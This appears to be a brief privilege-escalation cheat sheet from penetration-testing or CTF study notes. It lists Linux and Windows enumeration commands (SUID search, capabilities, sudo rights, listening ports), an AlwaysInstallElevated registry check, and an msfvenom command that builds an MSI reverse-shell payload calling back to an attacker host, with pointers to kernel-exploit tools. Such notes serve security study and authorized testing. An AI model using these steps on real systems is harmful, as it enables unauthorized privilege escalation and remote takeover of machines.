id Better than "whoami" because it might show interesting groups.
sudo -l Lists all files the current user has permission to execute as root.
find / -perm 4000 2>/dev/null Lists all files that have SUID bit set.
getcap -r / 2>/dev/null Lists all files with capabilities.
netstat -tulpan | grep LISTEN Show all open listening ports. Useful for finding services to exploit.
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer If both are set to 1, the system installs MSI packages as nt authority/system. Generate a reverse shell using something like msfvenom to generate a payload: msfvenom -p windows/x64/shell/reverse_tcp -f msi LHOST=<your ip> LPORT=<your port> > hack.msi.
If on an older system (or try your luck on newer systems), check for kernel exploits with Sherlock . Watson supersedes Sherlock, but is a pain to compile (on linux) due to the requirement of Visual Studio.
If you can determine if the system is vulnerable to a kernel exploit, it will almost definitely be in SecWiki .